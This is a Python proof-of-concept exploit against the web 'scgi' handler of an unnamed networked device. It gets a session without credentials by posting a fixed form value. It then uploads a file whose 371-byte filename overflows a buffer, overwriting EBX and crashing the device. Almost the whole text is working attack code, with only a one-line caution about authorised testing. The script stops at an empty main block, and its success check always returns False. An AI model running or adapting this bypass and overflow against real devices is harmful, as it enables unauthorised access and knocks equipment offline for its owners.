

import requests
from bs4 import BeautifulSoup
import sys
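# The target host comes from the command line.  This PoC is built to crash
# the device it is pointed at, over plain HTTP -- only run it against a
# device you are authorised to test.
if len(sys.argv) < 2:
    sys.exit("usage: " + sys.argv[0] + " <host>")
host = sys.argv[1]

# Login endpoint of the device's scgi handler, called with sid=0 (no session yet).
URL = "http://" + host + "/scgi?sid=0&pid=dologin"
# Every request carries this Referer; presumably the device rejects requests
# without one -- TODO confirm against the device.
head = {"Referer": "http://" + host + "/scgi?pid=0&action=dologin"}
# no auth login: the form body that obtains a session without credentials
# ("Cg==" is base64 for a single newline).
payload = {"fd": "Cg=="}
# Filler used as the uploaded file's content in docrash(); the overflow lives
# in the filename, not here.
junk = "E" * 10000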
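def getsid():
    """Log in to the device without credentials and return the session id.

    Posts ``payload`` to ``URL`` and pulls the sid out of the href of the
    first anchor in the response.  The ``[9:49]`` slice is an empirical
    offset (the original author's "fudge") -- verify it against the device's
    actual login response if the sid stops working.

    Returns:
        The sid string extracted from the href.

    Raises:
        RuntimeError: if the response has no anchor with an href, or the
            slice comes back empty, so the caller does not build a URL from
            a garbage sid.
        requests.exceptions.RequestException: if the device does not answer
            within the timeout.
    """
    # A timeout so a dead or already-crashed target does not hang the script.
    r = requests.post(URL, headers=head, data=payload, timeout=10)
    soup = BeautifulSoup(r.text, "lxml")
    anchor = soup.a
    href = anchor.get("href") if anchor is not None else None
    if not href:
        raise RuntimeError("login response has no anchor href; cannot extract sid")
    # fudge to get valid SID: the sid sits at a fixed offset inside the href
    sid = href[9:49]
    if not sid:
        raise RuntimeError("unexpected href %r: sid slice is empty" % (href,))
    return sid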
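def docrash():
    """Send the crashing upload to the device.

    Builds a 371-byte filename -- 367 bytes of padding plus four 'C's that,
    per the original author's note, overwrite the next 4 bytes (EBX) -- and
    posts it as the multipart filename of an upload with ``junk`` as the
    body.  The filename is the overflow vector, not the file content.

    Returns:
        True if the device dropped the connection or timed out (the expected
        outcome when the overflow crashes it), False if it answered normally.
        This is only a heuristic; confirm the crash on the device itself.

    Raises:
        RuntimeError: propagated from getsid() when no sid can be obtained.
    """
    crash = "A" * 367  # buffer to crash
    crash += "C" * 4  # overwrites next 4 bytes of EBX
    files = {"file": (crash, junk, "application/octet-stream", {'Expires': '0'})}
    # The sid is interpolated straight into the URL; getsid() refuses to
    # return an empty one so this cannot silently become sid=&pid=...
    form_url = "http://" + host + "/scgi?sid=" + getsid() + "&pid=uploadfile_name1.htm"
    try:
        rf = requests.post(form_url, headers=head, files=files, timeout=10)
    except requests.exceptions.RequestException:
        # A crashed target typically resets the connection or never answers.
        return True
    # Any HTTP answer means the handler survived the request.
    return rf.status_code is None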
if __name__ == "__main__":